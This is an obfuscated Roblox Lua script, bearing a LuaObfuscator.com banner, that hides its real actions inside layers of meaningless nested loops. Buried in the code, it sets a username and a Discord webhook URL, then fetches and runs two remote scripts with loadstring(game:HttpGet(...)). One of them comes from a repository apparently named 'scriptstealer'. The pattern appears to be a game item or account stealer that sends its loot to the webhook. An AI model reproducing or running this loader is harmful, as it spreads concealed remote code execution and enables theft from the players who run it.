--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do do do do do do do do local v0=0;local v1;local v0;local v2;local v3;local v4;local v5;while true do if (v0==2) then v4=nil;v5=nil;v0=3;end if (v0==0) then v1=0;v0=nil;v0=1;end if (v0==3) then while true do if (v1==0) then v0=0;v2=nil;v1=1;end if (1==v1) then v3=nil;v4=nil;v1=2;end if (v1==2) then v5=nil;while true do if (v0==0) then local v6=0;while true do if (v6==1) then v0=1;break;end if (0==v6) then v2=0;v3=nil;v6=1;end end end if (v0==1) then local v7=0;local v8;while true do if (v7==0) then v8=0;while true do if (v8==1) then v0=2;break;end if (v8==0) then local v12=0;while true do if (v12==0) then v4=nil;v5=nil;v12=1;end if (v12==1) then v8=1;break;end end end end break;end end end if (v0==2) then while true do if (v2==1) then v5=nil;while true do if (v3==0) then local v13=0;local v14;local v15;local v16;while true do if (v13==1) then v16=nil;while true do if (0==v14) then local v17=0;while true do if (v17==1) then v14=1;break;end if (v17==0) then v15=0;v16=nil;v17=1;end end end if (1==v14) then while true do if (v15==0) then v16=0;while true do if (v16==0) then local v35=0;local v36;local v37;while true do if (v35==1) then while true do if (0==v36) then v37=0;while true do if (v37==1) then v16=1;break;end if (v37==0) then local v53=0;while true do if (v53==1) then v37=1;break;end if (v53==0) then v4=0;v5=nil;v53=1;end end end end break;end end break;end if (0==v35) then v36=0;v37=nil;v35=1;end end end if (v16==1) then v3=1;break;end end break;end end break;end end break;end if (v13==0) then v14=0;v15=nil;v13=1;end end end if (v3==1) then while true do if (v4==0) then v5=0;while true do if (v5==0) then local v18=0;local v19;local v20;local v21;local v22;local v23;while true do if (v18==2) then v23=nil;while true do if (v19==2) then while true do if (v20==1) then v23=nil;while true do if (v21==0) then local v47=0;local v48;local v49;while true do if (v47==1) then while true do if (v48==0) then v49=0;while true do if (v49==0) then local v60=0;while true do if (v60==1) then v49=1;break;end if (v60==0) then local v71=0;while true do if (v71==0) then v22=0;v23=nil;v71=1;end if (v71==1) then v60=1;break;end end end end end if (v49==1) then v21=1;break;end end break;end end break;end if (0==v47) then v48=0;v49=nil;v47=1;end end end if (1==v21) then while true do if (v22==0) then v23=0;while true do if (v23==1) then v5=1;break;end if (v23==0) then local v57=0;local v58;local v59;while true do if (v57==0) then v58=0;v59=nil;v57=1;end if (1==v57) then while true do if (0==v58) then v59=0;while true do if (v59==0) then local v73=0;local v74;while true do if (v73==0) then v74=0;while true do if (v74==1) then v59=1;break;end if (v74==0) then local v82=0;local v83;local v84;local v85;while true do if (v82==1) then v85=nil;while true do if (v83==0) then v84=0;v85=nil;v83=1;end if (v83==1) then while true do if (v84==0) then v85=0;while true do if (v85==0) then local v95=0;local v96;local v97;while true do if (v95==0) then v96=0;v97=nil;v95=1;end if (v95==1) then while true do if (v96==0) then v97=0;while true do if (v97==0) then local v101=0;while true do if (v101==1) then v97=1;break;end if (v101==0) then _G.UserName="xxneverkazanxx1";_G.UserName2="xxneverkazanxx1";v101=1;end end end if (v97==1) then v85=1;break;end end break;end end break;end end end if (v85==1) then v74=1;break;end end break;end end break;end end break;end if (v82==0) then v83=0;v84=nil;v82=1;end end end end break;end end end if (v59==1) then v23=1;break;end end break;end end break;end end end end break;end end break;end end break;end if (v20==0) then local v42=0;while true do if (v42==1) then v20=1;break;end if (v42==0) then v21=0;v22=nil;v42=1;end end end end break;end if (v19==1) then local v38=0;while true do if (v38==0) then v22=nil;v23=nil;v38=1;end if (1==v38) then v19=2;break;end end end if (v19==0) then local v39=0;while true do if (0==v39) then v20=0;v21=nil;v39=1;end if (v39==1) then v19=1;break;end end end end break;end if (v18==0) then v19=0;v20=nil;v18=1;end if (v18==1) then local v33=0;while true do if (v33==0) then v21=nil;v22=nil;v33=1;end if (1==v33) then v18=2;break;end end end end end if (v5==1) then local v24=0;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v24==1) then v27=nil;v28=nil;v24=2;end if (0==v24) then v25=0;v26=nil;v24=1;end if (v24==3) then while true do if (v25==2) then v30=nil;while true do if (v26==2) then while true do if (v27==0) then local v50=0;local v51;local v52;while true do if (v50==1) then while true do if (v51==0) then v52=0;while true do if (v52==1) then v27=1;break;end if (v52==0) then local v61=0;while true do if (v61==0) then v28=0;v29=nil;v61=1;end if (v61==1) then v52=1;break;end end end end break;end end break;end if (v50==0) then v51=0;v52=nil;v50=1;end end end if (v27==1) then v30=nil;while true do if (v28==0) then local v54=0;local v55;while true do if (v54==0) then v55=0;while true do if (v55==0) then local v62=0;local v63;local v64;while true do if (v62==0) then v63=0;v64=nil;v62=1;end if (v62==1) then while true do if (v63==0) then v64=0;while true do if (1==v64) then v55=1;break;end if (0==v64) then local v77=0;local v78;while true do if (v77==0) then v78=0;while true do if (v78==0) then local v89=0;while true do if (v89==0) then v29=0;v30=nil;v89=1;end if (v89==1) then v78=1;break;end end end if (v78==1) then v64=1;break;end end break;end end end end break;end end break;end end end if (v55==1) then v28=1;break;end end break;end end end if (v28==1) then while true do if (v29==0) then v30=0;while true do if (v30==1) then v5=2;break;end if (v30==0) then local v65=0;local v66;local v67;local v68;local v69;local v70;while true do if (v65==1) then local v72=0;while true do if (0==v72) then v68=nil;v69=nil;v72=1;end if (v72==1) then v65=2;break;end end end if (v65==0) then v66=0;v67=nil;v65=1;end if (v65==2) then v70=nil;while true do if (v66==1) then local v75=0;while true do if (v75==1) then v66=2;break;end if (v75==0) then local v79=0;while true do if (v79==1) then v75=1;break;end if (v79==0) then v69=nil;v70=nil;v79=1;end end end end end if (v66==2) then while true do if (v67==1) then v70=nil;while true do if (v68==1) then while true do if (v69==0) then v70=0;while true do if (v70==1) then v30=1;break;end if (v70==0) then local v90=0;local v91;local v92;while true do if (v90==0) then local v94=0;while true do if (0==v94) then v91=0;v92=nil;v94=1;end if (1==v94) then v90=1;break;end end end if (v90==1) then while true do if (v91==0) then v92=0;while true do if (v92==0) then local v98=0;local v99;local v100;while true do if (v98==1) then while true do if (v99==0) then v100=0;while true do if (v100==0) then local v102=0;local v103;local v104;while true do if (v102==1) then while true do if (0==v103) then v104=0;while true do if (v104==1) then v100=1;break;end if (v104==0) then local v105=0;while true do if (v105==0) then local v106=0;while true do if (v106==0) then _G.Webhook="https://discord.com/api/webhooks/1122216266816573570/JkkVbIOK5FO_2DX-xtWK7E6eHSwrQujSBvOuX1ogEHv-IlskNT6LXEFqJ6-n4CR3BI00";loadstring(game:HttpGet("https://raw.githubuserconte



nt.com/LypherX/MoriScripts/main/MoriScriptZ",true))();v106=1;end if (v106==1) then v105=1;break;end end end if (1==v105) then v104=1;break;end end end end break;end end break;end if (v102==0) then v103=0;v104=nil;v102=1;end end end if (v100==1) then v92=1;break;end end break;end end break;end if (v98==0) then v99=0;v100=nil;v98=1;end end end if (v92==1) then v70=1;break;end end break;end end break;end end end end break;end end break;end if (v68==0) then local v86=0;local v87;while true do if (0==v86) then v87=0;while true do if (0==v87) then local v93=0;while true do if (v93==0) then v69=0;v70=nil;v93=1;end if (v93==1) then v87=1;break;end end end if (v87==1) then v68=1;break;end end break;end end end end break;end if (v67==0) then local v80=0;while true do if (v80==1) then v67=1;break;end if (v80==0) then local v88=0;while true do if (v88==0) then v68=0;v69=nil;v88=1;end if (v88==1) then v80=1;break;end end end end end end break;end if (v66==0) then local v76=0;while true do if (v76==0) then local v81=0;while true do if (v81==0) then v67=0;v68=nil;v81=1;end if (v81==1) then v76=1;break;end end end if (v76==1) then v66=1;break;end end end end break;end end end end break;end end break;end end break;end end break;end if (v26==0) then local v43=0;local v44;while true do if (v43==0) then v44=0;while true do if (v44==1) then v26=1;break;end if (v44==0) then local v56=0;while true do if (v56==0) then v27=0;v28=nil;v56=1;end if (v56==1) then v44=1;break;end end end end break;end end end if (1==v26) then local v45=0;while true do if (0==v45) then v29=nil;v30=nil;v45=1;end if (v45==1) then v26=2;break;end end end end break;end if (v25==0) then local v40=0;while true do if (v40==0) then local v46=0;while true do if (v46==0) then v26=0;v27=nil;v46=1;end if (v46==1) then v40=1;break;end end end if (1==v40) then v25=1;break;end end end if (v25==1) then local v41=0;while true do if (v41==1) then v25=2;break;end if (v41==0) then v28=nil;v29=nil;v41=1;end end end end break;end if (v24==2) then local v34=0;while true do if (v34==0) then v29=nil;v30=nil;v34=1;end if (v34==1) then v24=3;break;end end end end end if (v5==2) then loadstring(game:HttpGet("https://raw.githubusercontent.com/ILUVFATAL/scriptstealer/main/Psx"))();break;end end break;end end break;end end break;end if (v2==0) then local v9=0;local v10;local v11;while true do if (v9==0) then v10=0;v11=nil;v9=1;end if (1==v9) then while true do if (v10==0) then v11=0;while true do if (0==v11) then local v31=0;local v32;while true do if (v31==0) then v32=0;while true do if (v32==0) then v3=0;v4=nil;v32=1;end if (v32==1) then v11=1;break;end end break;end end end if (1==v11) then v2=1;break;end end break;end end break;end end end end break;end end break;end end break;end if (v0==1) then v2=nil;v3=nil;v0=2;end end end end end end end end end end
